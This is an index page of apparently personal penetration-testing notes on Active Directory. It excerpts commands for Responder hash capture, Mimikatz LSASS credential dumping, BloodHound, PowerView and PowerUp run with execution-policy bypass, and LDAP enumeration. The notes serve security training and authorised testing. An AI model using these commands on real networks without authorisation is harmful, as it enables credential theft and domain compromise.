akde/infosec

Click Here

  • Responder

    respon­der: Lis­ten with respon­der on a net­work and wait for AD sys­tems to ask for a DC. This can reveal a NTLM hash. (Source) Start respon­der on the own system: sudo responder -I tun0 --wpad Con­nect from the tar­get sys­tem to this sys­tem via smb. In the Win­dows explor­er, or in the com­mand line via dir…

  • Mimikatz

    Win­dows cre­ates and stores cre­den­tials in the Local Secu­ri­ty Author­i­ty Sub­sys­tem Ser­vice LSASS in the mem­o­ry. On the filesys­tem, the sam data­base stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDe­bug­Priv­i­lege so that we are able to com­mu­ni­cate with oth­er processes. privilege:debug Try to ele­vate priv­i­leges to obtain SYSTEM user privileges:…

  • BloodHound

    Blood­Hound ana­lyzes and present Active Direc­to­ry Data. SharpHound is the data col­lec­tor which runs on a com­pro­mised AD system. On the target: On the own system:

  • Basic Active Directory Enumeration

    Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already admin­is­tra­tive privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) infor­ma­tion like full names, group mem­ber­ships, etc.…

  • PowerSploit / PowerView

    Col­lec­tion of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enu­mer­ates all users. Get-NetUser Enu­mer­ate all users which does not require Ker­beros preauth. Get-NetUser -PreauthNotRequired Returns…

  • Active Directory notes

    Check­list A domain of a DC con­sists out of the fol­low­ing elements: An object in AD may have a set of ACE Access Con­trol Entries which is called ACL Access Con­trol List. An objec­t’s ACE can be retrieved in PS with Get-ObjectAcl [-Identity| $object. The SCM Ser­vice Con­trol Man­ag­er con­tains a data­base of installed ser­vices…

  • LDAP Lightweight Directory Access Protocol

    Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enu­mer­a­tion scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Con­nect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…